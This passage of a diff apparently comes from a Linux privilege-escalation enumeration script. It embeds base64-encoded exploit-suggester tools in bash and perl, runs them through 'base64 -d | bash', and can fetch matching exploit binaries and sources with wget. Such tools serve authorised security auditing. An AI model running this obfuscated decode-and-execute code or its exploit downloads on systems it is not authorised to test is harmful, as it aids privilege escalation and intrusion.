ZiBbICIkb3B0X2tlcm5lbF9vbmx5IiA9ICJ0cnVlIiAtbyAteiAiJFBLR19MSVNUIiBdOyB0aGVuCiAgICB1bnNldCBFWFBMT0lUU19VU0VSU1BBQ0UKICAgIGRlY2xhcmUgLUEgRVhQTE9JVFNfVVNFUlNQQUNFCmZpCgppZiBbICIkb3B0X3VzZXJzcGFjZV9vbmx5IiA9ICJ0cnVlIiBdOyB0aGVuCiAgICB1bnNldCBFWFBMT0lUUwogICAgZGVjbGFyZSAtQSBFWFBMT0lUUwpmaQoKZWNobwplY2hvIC1lICIke2JsZHdodH1TZWFyY2hpbmcgYW1vbmc6JHt0eHRyc3R9IgplY2hvCmVjaG8gIiR7I0VYUExPSVRTW0BdfSBrZXJuZWwgc3BhY2UgZXhwbG9pdHMiCmVjaG8gIiR7I0VYUExPSVRTX1VTRVJTUEFDRVtAXX0gdXNlciBzcGFjZSBleHBsb2l0cyIKZWNobwoKZWNobyAtZSAiJHtibGR3aHR9UG9zc2libGUgRXhwbG9pdHM6JHt0eHRyc3R9IgplY2hvCgojIHN0YXJ0IGFuYWx5c2lzCmo9MApmb3IgRVhQIGluICIke0VYUExPSVRTW0BdfSIgIiR7RVhQTE9JVFNfVVNFUlNQQUNFW0BdfSI7IGRvCgogICAgIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRVhQIgoKICAgIE5BTUU9IiR7YXJyWzBdfSIgJiYgTkFNRT0iJHtOQU1FOjZ9IgogICAgUkVRUz0iJHthcnJbMV19IiAmJiBSRVFTPSIke1JFUVM6Nn0iCiAgICBUQUdTPSIke2FyclsyXX0iICYmIFRBR1M9IiR7VEFHUzo2fSIKICAgIFJBTks9IiR7YXJyWzNdfSIgJiYgUkFOSz0iJHtSQU5LOjZ9IgoKICAgICMgc3BsaXQgbGluZSB3aXRoIHJlcXVpcmVtZW50cyAmIGxvb3AgdGhydSBhbGwgcmVxcyBvbmUgYnkgb25lICYgY2hlY2sgd2hldGhlciBpdCBpcyBtZXQKICAgIElGUz0nLCcgcmVhZCAtciAtYSBhcnJheSA8PDwgIiRSRVFTIgogICAgUkVRU19OVU09JHsjYXJyYXlbQF19CiAgICBQQVNTRURfUkVRPTAKICAgIGZvciBSRVEgaW4gIiR7YXJyYXlbQF19IjsgZG8KICAgICAgICBpZiAoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIgIiR7YXJyYXlbMF19Iik7IHRoZW4KICAgICAgICAgICAgUEFTU0VEX1JFUT0kKCgkUEFTU0VEX1JFUSArIDEpKQogICAgICAgIGVsc2UKICAgICAgICAgICAgYnJlYWsKICAgICAgICBmaQogICAgZG9uZQoKICAgICMgZXhlY3V0ZSBmb3IgZXhwbG9pdHMgd2l0aCBhbGwgcmVxdWlyZW1lbnRzIG1ldAogICAgaWYgWyAkUEFTU0VEX1JFUSAtZXEgJFJFUVNfTlVNIF07IHRoZW4KCiAgICAgICAgIyBhZGRpdGlvbmFsIHJlcXVpcmVtZW50IGZvciAtLWN2ZWxpc3QtZmlsZSBtb2RlOiBjaGVjayBpZiBDVkUgYXNzb2NpYXRlZCB3aXRoIHRoZSBleHBsb2l0IGlzIG9uIHRoZSBDVkVMSVNUX0ZJTEUKICAgICAgICBpZiBbICIkb3B0X2N2ZWxpc3RfZmlsZSIgPSAidHJ1ZSIgXTsgdGhlbgoKICAgICAgICAgICAgIyBleHRyYWN0IENWRShzKSBhc3NvY2lhdGVkIHdpdGggZ2l2ZW4gZXhwbG9pdCAoYWxzbyB0cmFuc2xhdGVzICcsJyB0byAnfCcgZm9yIGVhc3kgaGFuZGxpbmcgbXVsdGlwbGUgQ1ZFcyBjYXNlIC0gdmlhIGV4dGVuZGVkIHJlZ2V4KQogICAgICAgICAgICBjdmU9JChlY2hvICIkTkFNRSIgfCBncmVwICcuKlxbLipcXS4qJyB8IGN1dCAtZCAnbScgLWYyIHwgY3V0IC1kICddJyAtZjEgfCB0ciAtZCAnWycgfCB0ciAiLCIgInwiKQogICAgICAgICAgICAjZWNobyAiQ1ZFOiAkY3ZlIgoKICAgICAgICAgICAgIyBjaGVjayBpZiBpdCdzIG9uIENWRUxJU1RfRklMRSBsaXN0LCBpZiBubyBtb3ZlIHRvIG5leHQgZXhwbG9pdAogICAgICAgICAgICBbICEgJChjYXQgIiRDVkVMSVNUX0ZJTEUiIHwgZ3JlcCAtRSAiJGN2ZSIpIF0gJiYgY29udGludWUKICAgICAgICBmaQoKICAgICAgICAjIHByb2Nlc3MgdGFncyBhbmQgaGlnaGxpZ2h0IHRob3NlIHRoYXQgbWF0Y2ggY3VycmVudCBPUyAob25seSBmb3IgZGVifHVidW50dXxSSEVMIGFuZCBpZiB3ZSBrbm93IGRpc3RybyB2ZXJzaW9uIC0gZGlyZWN0IG1vZGUpCiAgICAgICAgdGFncz0iIgogICAgICAgIGlmIFsgLW4gIiRUQUdTIiAtYSAtbiAiJE9TIiBdOyB0aGVuCiAgICAgICAgICAgIElGUz0nLCcgcmVhZCAtciAtYSB0YWdzX2FycmF5IDw8PCAiJFRBR1MiCiAgICAgICAgICAgIFRBR1NfTlVNPSR7I3RhZ3NfYXJyYXlbQF19CgogICAgICAgICAgICAjIGJ1bXAgUkFOSyBzbGlnaHRseSAoKzEpIGlmIHdlJ3JlIGluICctLXVuYW1lJyBtb2RlIGFuZCB0aGVyZSdzIGEgVEFHIGZvciBPUyBmcm9tIHVuYW1lIHN0cmluZwogICAgICAgICAgICBbICIkKGVjaG8gIiR7dGFnc19hcnJheVtAXX0iIHwgZ3JlcCAiJE9TIikiIC1hICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gInRydWUiIF0gJiYgUkFOSz0kKCgkUkFOSyArIDEpKQoKICAgICAgICAgICAgZm9yIFRBRyBpbiAiJHt0YWdzX2FycmF5W0BdfSI7IGRvCiAgICAgICAgICAgICAgICB0YWdfZGlzdHJvPSQoZWNobyAiJFRBRyIgfCBjdXQgLWQnPScgLWYxKQogICAgICAgICAgICAgICAgdGFnX2Rpc3Ryb19udW1fYWxsPSQoZWNobyAiJFRBRyIgfCBjdXQgLWQnPScgLWYyKQogICAgICAgICAgICAgICAgIyBpbiBjYXNlIG9mIHRhZyBvZiBmb3JtOiAndWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMX0gcmVtb3ZlIGtlcm5lbCB2ZXJzaW9uaW5nIHBhcnQgZm9yIGNvbXBhcmlzaW9uCiAgICAgICAgICAgICAgICB0YWdfZGlzdHJvX251bT0iJHt0YWdfZGlzdHJvX251bV9hbGwleyp9IgoKICAgICAgICAgICAgICAgICMgd2UncmUgaW4gJy0tdW5hbWUnIG1vZGUgT1IgKGZvciBub3JtYWwgbW9kZSkgaWYgdGhlcmUgaXMgZGlzdHJvIHZlcnNpb24gbWF0Y2gKICAgICAgICAgICAgICAgIGlmIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAidHJ1ZSIgLW8gXCggIiRPUyIgPT0gIiR0YWdfZGlzdHJvIiAtYSAiJChlY2hvICIkRElTVFJPIiB8IGdyZXAgLUUgIiR0YWdfZGlzdHJvX251bSIpIiBcKSBdOyB0aGVuCgogICAgICAgICAgICAgICAgICAgICMgYnVtcCBjdXJyZW50IGV4cGxvaXQncyByYW5rIGJ5IDIgZm9yIGRpc3RybyBtYXRjaCAoYW5kIG5vdCBpbiAnLS11bmFtZScgbW9kZSkKICAgICAgICAgICAgICAgICAgICBbICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gImZhbHNlIiBdICYmIFJBTks9JCgoJFJBTksgKyAyKSkKCiAgICAgICAgICAgICAgICAgICAgIyBnZXQgbmFtZSAoa2VybmVsIG9yIHBhY2thZ2UgbmFtZSkgYW5kIHZlcnNpb24gb2Yga2VybmVsL3BrZyBpZiBwcm92aWRlZDoKICAgICAgICAgICAgICAgICAgICB0YWdfcGtnPSQoZWNobyAiJHRhZ19kaXN0cm9fbnVtX2FsbCIgfCBjdXQgLWQneycgLWYgMiB8IHRyIC1kICd9JyB8IGN1dCAtZCc6JyAtZiAxKQogICAgICAgICAgICAgICAgICAgIHRhZ19wa2dfbnVtPSIiCiAgICAgICAgICAgICAgICAgICAgWyAkKGVjaG8gIiR0YWdfZGlzdHJvX251bV9hbGwiIHwgZ3JlcCAneycpIF0gJiYgdGFnX3BrZ19udW09JChlY2hvICIkdGFnX2Rpc3Ryb19udW1fYWxsIiB8IGN1dCAtZCd7JyAtZiAyIHwgdHIgLWQgJ30nIHwgY3V0IC1kJzonIC1mIDIpCgogICAgICAgICAgICAgICAgICAgICNbIC1uICIkdGFnX3BrZ19udW0iIF0gJiYgZWNobyAidGFnX3BrZ19udW06ICR0YWdfcGtnX251bTsga2VybmVsOiAkS0VSTkVMX0FMTCIKCiAgICAgICAgICAgICAgICAgICAgIyBpZiBwa2cva2VybmVsIHZlcnNpb24gaXMgbm90IHByb3ZpZGVkOgogICAgICAgICAgICAgICAgICAgIGlmIFsgLXogIiR0YWdfcGtnX251bSIgXTsgdGhlbgogICAgICAgICAgICAgICAgICAgICAgICBbICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gImZhbHNlIiBdICYmIFRBRz0iJHtsaWdodHllbGxvd31bICR7VEFHfSBdJHt0eHRyc3R9IgoKICAgICAgICAgICAgICAgICAgICAjIGtlcm5lbCB2ZXJzaW9uIHByb3ZpZGVkLCBjaGVjayBmb3IgbWF0Y2g6CiAgICAgICAgICAgICAgICAgICAgZWxpZiBbIC1uICIkdGFnX3BrZ19udW0iIC1hICIkdGFnX3BrZyIgPSAia2VybmVsIiBdOyB0aGVuCiAgICAgICAgICAgICAgICAgICAgICAgIGlmIFsgJChlY2hvICIkS0VSTkVMX0FMTCIgfCBncmVwIC1FICIke3RhZ19wa2dfbnVtfSIpIF07IHRoZW4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICMga2VybmVsIHZlcnNpb24gbWF0Y2hlZCAtIGJvbGQgaGlnaGxpZ2h0CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUQUc9IiR7eWVsbG93fVsgJHtUQUd9IF0ke3R4dHJzdH0iCgogICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBidW1wIGN1cnJlbnQgZXhwbG9pdCdzIHJhbmsgYWRkaXRpb25hbGx5IGJ5IDMgZm9yIGtlcm5lbCB2ZXJzaW9uIHJlZ2V4IG1hdGNoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBSQU5LPSQoKCRSQU5LICsgMykpCiAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UKICAgICAgICAgICAgICAgICAgICAgICAgICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAiZmFsc2UiIF0gJiYgVEFHPSIke2xpZ2h0eWVsbG93fVsgJHRhZ19kaXN0cm89JHRhZ19kaXN0cm9fbnVtIF0ke3R4dHJzdH17a2VybmVsOiR0YWdfcGtnX251bX0iCiAgICAgICAgICAgICAgICAgICAgICAgIGZpCgogICAgICAgICAgICAgICAgICAgICMgcGtnIHZlcnNpb24gcHJvdmlkZWQsIGNoZWNrIGZvciBtYXRjaCAoVEJEKToKICAgICAgICAgICAgICAgICAgICBlbGlmIFsgLW4gIiR0YWdfcGtnX251bSIgLWEgLW4gIiR0YWdfcGtnIiAgXTsgdGhlbgogICAgICAgICAgICAgICAgICAgICAgICBUQUc9IiR7bGlnaHR5ZWxsb3d9WyAkdGFnX2Rpc3Rybz0kdGFnX2Rpc3Ryb19udW0gXSR7dHh0cnN0fXskdGFnX3BrZzokdGFnX3BrZ19udW19IgogICAgICAgICAgICAgICAgICAgIGZpCgogICAgICAgICAgICAgICAgZmkKCiAgICAgICAgICAgICAgICAjIGFwcGVuZCBjdXJyZW50IHRhZyB0byB0YWdzIGxpc3QKICAgICAgICAgICAgICAgIHRhZ3M9IiR7dGFnc30ke1RBR30sIgogICAgICAgICAgICBkb25lCiAgICAgICAgICAgICMgdHJpbSAnLCcgYWRkZWQgYnkgYWJvdmUgbG9vcAogICAgICAgICAgICBbIC1uICIkdGFncyIgXSAmJiB0YWdzPSIke3RhZ3MlP30iCiAgICAgICAgZWxzZQogICAgICAgICAgICB0YWdzPSIkVEFHUyIKICAgICAgICBmaQoKICAgICAgICAjIGluc2VydCB0aGUgbWF0Y2hlZCBleHBsb2l0ICh3aXRoIGNhbGN1bGF0ZWQgUmFuayBhbmQgaGlnaGxpZ2h0ZWQgdGFncykgdG8gYXJyYXJ5IHRoYXQgd2lsbCBiZSBzb3J0ZWQKICAgICAgICBFWFA9JChlY2hvICIkRVhQIiB8IHNlZCAtZSAnL15OYW1lOi9kJyAtZSAnL15SZXFzOi9kJyAtZSAnL15UYWdzOi9kJykKICAgICAgICBleHBsb2l0c190b19zb3J0W2pdPSIke1JBTkt9TmFtZTogJHtOQU1FfUQzTDFtUmVxczogJHtSRVFTfUQzTDFtVGFnczogJHt0YWdzfUQzTDFtJChlY2hvICIkRVhQIiB8IHNlZCAtZSAnOmEnIC1lICdOJyAtZSAnJCFiYScgLWUgJ3MvXG4vRDNMMW0vZycpIgogICAgICAgICgoaisrKSkKICAgIGZpCmRvbmUKCiMgc29ydCBleHBsb2l0cyBiYXNlZCBvbiBjYWxjdWxhdGVkIFJhbmsKSUZTPSQnXG4nClNPUlRFRF9FWFBMT0lUUz0oJChzb3J0IC1yIDw8PCIke2V4cGxvaXRzX3RvX3NvcnRbKl19IikpCnVuc2V0IElGUwoKIyBkaXNwbGF5IHNvcnRlZCBleHBsb2l0cwpmb3IgRVhQX1RFTVAgaW4gIiR7U09SVEVEX0VYUExPSVRTW0BdfSI7IGRvCgoJUkFOSz0kKGVjaG8gIiRFWFBfVEVNUCIgfCBhd2sgLUYnTmFtZTonICd7cHJpbnQgJDF9JykKCgkjIGNvbnZlcnQgZW50cnkgYmFjayB0byBjYW5vbmljYWwgZm9ybQoJRVhQPSQoZWNobyAiJEVYUF9URU1QIiB8IHNlZCAncy9eWzAtOV0vL2cnIHwgc2VkICdzL0QzTDFtL1xuL2cnKQoKCSMgY3JlYXRlIGFycmF5IGZyb20gY3VycmVudCBleHBsb2l0IGhlcmUgZG9jIGFuZCBmZXRjaCBuZWVkZWQgbGluZXMKICAgIGk9MAogICAgIyAoJy1yJyBpcyB1c2VkIHRvIG5vdCBpbnRlcnByZXQgYmFja3NsYXNoIHVzZWQgZm9yIGJhc2ggY29sb3JzKQogICAgd2hpbGUgcmVhZCAtciBsaW5lCiAgICBkbwogICAgICAgIGFycltpXT0iJGxpbmUiCiAgICAgICAgaT0kKChpICsgMSkpCiAgICBkb25lIDw8PCAiJEVYUCIKCiAgICBOQU1FPSIke2FyclswXX0iICYmIE5BTUU9IiR7TkFNRTo2fSIKICAgIFJFUVM9IiR7YXJyWzFdfSIgJiYgUkVRUz0iJHtSRVFTOjZ9IgogICAgVEFHUz0iJHthcnJbMl19IiAmJiB0YWdzPSIke1RBR1M6Nn0iCgoJRVhQTE9JVF9EQj0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiZXhwbG9pdC1kYjogIiB8IGF3ayAne3ByaW50ICQyfScpCglhbmFseXNpc191cmw9JChlY2hvICIkRVhQIiB8IGdyZXAgImFuYWx5c2lzLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCglleHRfdXJsPSQoZWNobyAiJEVYUCIgfCBncmVwICJleHQtdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9JykKCWNvbW1lbnRzPSQoZWNobyAiJEVYUCIgfCBncmVwICJDb21tZW50czogIiB8IGN1dCAtZCcgJyAtZiAyLSkKCXJlcXM9JChlY2hvICIkRVhQIiB8IGdyZXAgIlJlcXM6ICIgfCBjdXQgLWQnICcgLWYgMikKCgkjIGV4cGxvaXQgbmFtZSB3aXRob3V0IENWRSBudW1iZXIgYW5kIHdpdGhvdXQgY29tbW9ubHkgdXNlZCBzcGVjaWFsIGNoYXJzCgluYW1lPSQoZWNobyAiJE5BTUUiIHwgY3V0IC1kJyAnIC1mIDItIHwgdHIgLWQgJyAoKS8nKQoKCWJpbl91cmw9JChlY2hvICIkRVhQIiB8IGdyZXAgImJpbi11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoJc3JjX3VybD0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAic3JjLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCglbIC16ICIkc3JjX3VybCIgXSAmJiBbIC1uICIkRVhQTE9JVF9EQiIgXSAmJiBzcmNfdXJsPSJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9kb3dubG9hZC8kRVhQTE9JVF9EQiIKCVsgLXogIiRzcmNfdXJsIiBdICYmIFsgLXogIiRiaW5fdXJsIiBdICYmIGV4aXRXaXRoRXJyTXNnICInc3JjLXVybCcgLyAnYmluLXVybCcgLyAnZXhwbG9pdC1kYicgZW50cmllcyBhcmUgYWxsIGVtcHR5IGZvciAnJE5BTUUnIGV4cGxvaXQgLSBmaXggdGhhdC4gQWJvcnRpbmcuIgoKCWlmIFsgLW4gIiRhbmFseXNpc191cmwiIF07IHRoZW4KICAgICAgICBkZXRhaWxzPSIkYW5hbHlzaXNfdXJsIgoJZWxpZiAkKGVjaG8gIiRzcmNfdXJsIiB8IGdyZXAgLXEgJ3d3dy5leHBsb2l0LWRiLmNvbScpOyB0aGVuCiAgICAgICAgZGV0YWlscz0iaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvJEVYUExPSVRfREIvIgoJZWxpZiBbWyAiJHNyY191cmwiID1+IF4uKnRnenx0YXIuZ3p8emlwJCAmJiAtbiAiJEVYUExPSVRfREIiIF1dOyB0aGVuCiAgICAgICAgZGV0YWlscz0iaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvJEVYUExPSVRfREIvIgoJZWxzZQogICAgICAgIGRldGFpbHM9IiRzcmNfdXJsIgoJZmkKCgkjIHNraXAgRG9TIGJ5IGRlZmF1bHQKCWRvcz0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAtbyAtaSAiKGRvcyIpCglbICIkb3B0X3Nob3dfZG9zIiA9PSAiZmFsc2UiIF0gJiYgWyAtbiAiJGRvcyIgXSAmJiBjb250aW51ZQoKCSMgaGFuZGxlcyAtLWZldGNoLWJpbmFyaWVzIG9wdGlvbgoJaWYgWyAkb3B0X2ZldGNoX2JpbnMgPSAidHJ1ZSIgXTsgdGhlbgogICAgICAgIGZvciBpIGluICQoZWNobyAiJEVYUCIgfCBncmVwICJiaW4tdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9Jyk7IGRvCiAgICAgICAgICAgIFsgLWYgIiR7bmFtZX1fJChiYXNlbmFtZSAkaSkiIF0gJiYgcm0gLWYgIiR7bmFtZX1fJChiYXNlbmFtZSAkaSkiCiAgICAgICAgICAgIHdnZXQgLXEgLWsgIiRpIiAtTyAiJHtuYW1lfV8kKGJhc2VuYW1lICRpKSIKICAgICAgICBkb25lCiAgICBmaQoKCSMgaGFuZGxlcyAtLWZldGNoLXNvdXJjZXMgb3B0aW9uCglpZiBbICRvcHRfZmV0Y2hfc3JjcyA9ICJ0cnVlIiBdOyB0aGVuCiAgICAgICAgWyAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRzcmNfdXJsKSIgXSAmJiBybSAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRzcmNfdXJsKSIKICAgICAgICB3Z2V0IC1xIC1rICIkc3JjX3VybCIgLU8gIiR7bmFtZX1fJChiYXNlbmFtZSAkc3JjX3VybCkiICYKICAgIGZpCgogICAgIyBkaXNwbGF5IHJlc3VsdCAoc2hvcnQpCglpZiBbICIkb3B0X3N1bW1hcnkiID0gInRydWUiIF07IHRoZW4KCVsgLXogIiR0YWdzIiBdICYmIHRhZ3M9Ii0iCgllY2hvIC1lICIkTkFNRSB8fCAkdGFncyB8fCAkc3JjX3VybCIKCWNvbnRpbnVlCglmaQoKIyBkaXNwbGF5IHJlc3VsdCAoc3RhbmRhcmQpCgllY2hvIC1lICJbK10gJE5BTUUiCgllY2hvIC1lICJcbiAgIERldGFpbHM6ICRkZXRhaWxzIgogICAgICAgIGVjaG8gLWUgIiAgIEV4cG9zdXJlOiAkKGRpc3BsYXlFeHBvc3VyZSAkUkFOSykiCiAgICAgICAgWyAtbiAiJHRhZ3MiIF0gJiYgZWNobyAtZSAiICAgVGFnczogJHRhZ3MiCiAgICAgICAgZWNobyAtZSAiICAgRG93bmxvYWQgVVJMOiAkc3JjX3VybCIKICAgICAgICBbIC1uICIkZXh0X3VybCIgXSAmJiBlY2hvIC1lICIgICBleHQtdXJsOiAkZXh0X3VybCIKICAgICAgICBbIC1uICIkY29tbWVudHMiIF0gJiYgZWNobyAtZSAiICAgQ29tbWVudHM6ICRjb21tZW50cyIKCiAgICAgICAgIyBoYW5kbGVzIC0tZnVsbCBmaWx0ZXIgb3B0aW9uCiAgICAgICAgaWYgWyAiJG9wdF9mdWxsIiA9ICJ0cnVlIiBdOyB0aGVuCiAgICAgICAgICAgIFsgLW4gIiRyZXFzIiBdICYmIGVjaG8gLWUgIiAgIFJlcXVpcmVtZW50czogJHJlcXMiCgogICAgICAgICAgICBbIC1uICIkRVhQTE9JVF9EQiIgXSAmJiBlY2hvIC1lICIgICBleHBsb2l0LWRiOiAkRVhQTE9JVF9EQiIKCiAgICAgICAgICAgIGF1dGhvcj0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiYXV0aG9yOiAiIHwgY3V0IC1kJyAnIC1mIDItKQogICAgICAgICAgICBbIC1uICIkYXV0aG9yIiBdICYmIGVjaG8gLWUgIiAgIGF1dGhvcjogJGF1dGhvciIKICAgICAgICBmaQoKICAgICAgICBlY2hvCgpkb25lCg==" echo $les_b64 | base64 -d | bash echo "" - fi +fi - if [ "$(command -v perl 2>/dev/null)" ]; then +if [ "$(command -v perl 2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester 2" print_info "https://github.com/jondonas/linux-exploit-suggester-2" les2_b64="IyEvdXNyL2Jpbi9wZXJsCnVzZSBzdHJpY3Q7CnVzZSB3YXJuaW5nczsKdXNlIEdldG9wdDo6U3RkOwoKb3VyICRWRVJTSU9OID0gJzInOwoKbXkgJW9wdHM7CmdldG9wdHMoICdrOmhkJywgXCVvcHRzICk7CmlmIChleGlzdHMgJG9wdHN7aH0pIHsKICAgIHVzYWdlKCk7CiAgICBleGl0Owp9OwoKcHJpbnRfYmFubmVyKCk7Cm15ICggJGtob3N0LCAkaXNfcGFydGlhbCApID0gZ2V0X2tlcm5lbCgpOwpwcmludCAiICBMb2NhbCBLZXJuZWw6IFxlWzAwOzMzbSRraG9zdFxlWzAwbVxuIjsKCm15ICVleHBsb2l0cyA9IGdldF9leHBsb2l0cygpOwpwcmludCAnICBTZWFyY2hpbmcgJyAuIHNjYWxhciBrZXlzKCVleHBsb2l0cykgLiAiIGV4cGxvaXRzLi4uXG5cbiI7CnByaW50ICIgIFxlWzE7MzVtUG9zc2libGUgRXhwbG9pdHNcZVswMG1cbiI7CgpteSAkY291bnQgPSAxOwpteSBAYXBwbGljYWJsZSA9ICgpOwpFWFBMT0lUOgpmb3JlYWNoIG15ICRrZXkgKCBzb3J0IGtleXMgJWV4cGxvaXRzICkgewogICAgZm9yZWFjaCBteSAka2VybmVsICggQHsgJGV4cGxvaXRzeyRrZXl9e3Z1bG59IH0gKSB7CgogICAgICAgIGlmICggICAgICRraG9zdCBlcSAka2VybmVsCiAgICAgICAgICAgICAgb3IgKCAkaXNfcGFydGlhbCBhbmQgaW5kZXgoJGtlcm5lbCwka2hvc3QpID09IDAgKQogICAgICAgICkgewogICAgICAgICAgICAkZXhwbG9pdHN7JGtleX17a2V5fSA9ICRrZXk7CiAgICAgICAgICAgIHB1c2goQGFwcGxpY2FibGUsICRleHBsb2l0c3ska2V5fSk7CiAgICAgICAgICAgIHByaW50ICIgIFxlWzAwOzMzbVtcZVswMG1cZVswMDszMW0kY291bnRcZVswMG1cZVswMDszM21dXGVbMDBtICI7CiAgICAgICAgICAgIHByaW50ICJcZVswMDszM20ka2V5XGVbMDBtIjsKICAgICAgICAgICAgcHJpbnQgIiBcZVswMDszM20oJGtlcm5lbClcZVswMG0iIGlmICRpc19wYXJ0aWFsOwoKICAgICAgICAgICAgbXkgJGFsdCA9ICRleHBsb2l0c3ska2V5fXthbHR9OwogICAgICAgICAgICBteSAkY3ZlID0gJGV4cGxvaXRzeyRrZXl9e2N2ZX07CiAgICAgICAgICAgIG15ICRtbHcgPSAkZXhwbG9pdHN7JGtleX17bWlsfTsKICAgICAgICAgICAgaWYgKCAkYWx0IG9yICRjdmUgKSB7CiAgICAgICAgICAgICAgICBwcmludCAiXG4iOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGlmICggJGFsdCApIHsgcHJpbnQgIiAgICAgIEFsdDogJGFsdCAiOyB9CiAgICAgICAgICAgIGlmICggJGN2ZSApIHsgcHJpbnQgIiAgICAgIENWRS0kY3ZlIjsgfQogICAgICAgICAgICBpZiAoICRtbHcgKSB7IHByaW50ICJcbiAgICAgIFNvdXJjZTogJG1sdyI7IH0KICAgICAgICAgICAgcHJpbnQgIlxuIjsKICAgICAgICAgICAgJGNvdW50ICs9IDE7CiAgICAgICAgICAgIG5leHQgRVhQTE9JVDsKICAgICAgICB9CiAgICB9Cn0KcHJpbnQgIlxuIjsKCmlmICghQGFwcGxpY2FibGUpIHsKICAgIHByaW50ICIgIE5vIGV4cGxvaXRzIGFyZSBhdmFpbGFibGUgZm9yIHRoaXMga2VybmVsIHZlcnNpb25cblxuIjsKICAgIGV4aXQ7Cn0KCmlmIChleGlzdHMgJG9wdHN7ZH0pIHsKICAgIHByaW50ICIgIFxlWzE7MzZtRXhwbG9pdCBEb3dubG9hZFxlWzAwbVxuIjsKICAgIHByaW50ICIgIChEb3dubG9hZCBhbGw6IFxlWzAwOzMzbSdhJ1xlWzAwbSAvIEluZGl2aWR1YWxseTogXGVbMDA7MzNtJzIsNCw1J1xlWzAwbSAiOwogICAgcHJpbnQgIi8gRXhpdDogXGVbMDA7MzNtXmNcZVswMG0pXG4iOwogICAgcHJpbnQgIiAgU2VsZWN0IGV4cGxvaXRzIHRvIGRvd25sb2FkOiAiOwoKICAgIHdoaWxlICgxKSB7CiAgICAgICAgbXkgJGlucHV0ID0gPFNURElOPjsKICAgICAgICAkaW5wdXQgPX4gcy9ccysvL2c7CgogICAgICAgIGlmICgkaW5wdXQgPX4gL15hJC8pIHsKICAgICAgICAgICAgbXkgQHNlbGVjdGVkID0gKCk7CiAgICAgICAgICAgIGZvciAobXkgJGk9MTsgJGkgPD0gc2NhbGFyIEBhcHBsaWNhYmxlOyAkaSsrKSB7CiAgICAgICAgICAgICAgIHB1c2goQHNlbGVjdGVkLCAkaSk7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZG93bmxvYWRfZXhwbG9pdHMoXEBzZWxlY3RlZCwgXEBhcHBsaWNhYmxlKTsKICAgICAgICAgICAgbGFzdDsKICAgICAgICB9CiAgICAgICAgZWxzaWYgKCRpbnB1dCA9fiAvXigwfFsxLTldWzAtOV0qKSgsKDB8WzEtOV1bMC05XSopKSokLykgewogICAgICAgICAgICBteSBAc2VsZWN0ZWQgPSB1bmlxKHNwbGl0KCcsJywgJGlucHV0KSk7CiAgICAgICAgICAgIEBzZWxlY3RlZCA9IHNvcnQgeyRhIDw9PiAkYn0gQHNlbGVjdGVkOwogICAgICAgICAgICBpZiAoJHNlbGVjdGVkWzBdID4gMCAmJiAkc2VsZWN0ZWRbLTFdIDw9IHNjYWxhciBAYXBwbGljYWJsZSkgewogICAgICAgICAgICAgICAgZG93bmxvYWRfZXhwbG9pdHMoXEBzZWxlY3RlZCwgXEBhcHBsaWNhYmxlKTsKICAgICAgICAgICAgICAgIGxhc3Q7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWxzZSB7CiAgICAgICAgICAgICAgIHByaW50ICIgIFxlWzAwOzMxbUlucHV0IGlzIG91dCBvZiByYW5nZS5cZVswMG0gU2VsZWN0IGV4cGxvaXRzIHRvIGRvd25sb2FkOiAiOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGVsc2UgewogICAgICAgICAgICBwcmludCAiICBcZVswMDszMW1JbnZhbGlkIGlucHV0LlxlWzAwbSBTZWxlY3QgZXhwbG9pdHMgdG8gZG93bmxvYWQ6ICI7CiAgICAgICAgfQogICAgfQp9OwpleGl0OwoKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIyBleHRyYSBmdW5jdGlvbnMgICMjCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKCnN1YiBnZXRfa2VybmVsIHsKICAgIG15ICRraG9zdCA9ICcnOwoKICAgIGlmICggZXhpc3RzICRvcHRze2t9ICkgewogICAgICAgICRraG9zdCA9ICRvcHRze2t9OwogICAgfQogICAgZWxzZSB7CiAgICAgICAgJGtob3N0ID0gYHVuYW1lIC1yIHxjdXQgLWQiLSIgLWYxYDsKICAgICAgICBjaG9tcCAka2hvc3Q7CiAgICB9CgogICAgaWYgKCFkZWZpbmVkICRraG9zdCB8fCAhKCRraG9zdCA9fiAvXlswLTldKyhbLl1bMC05XSspKiQv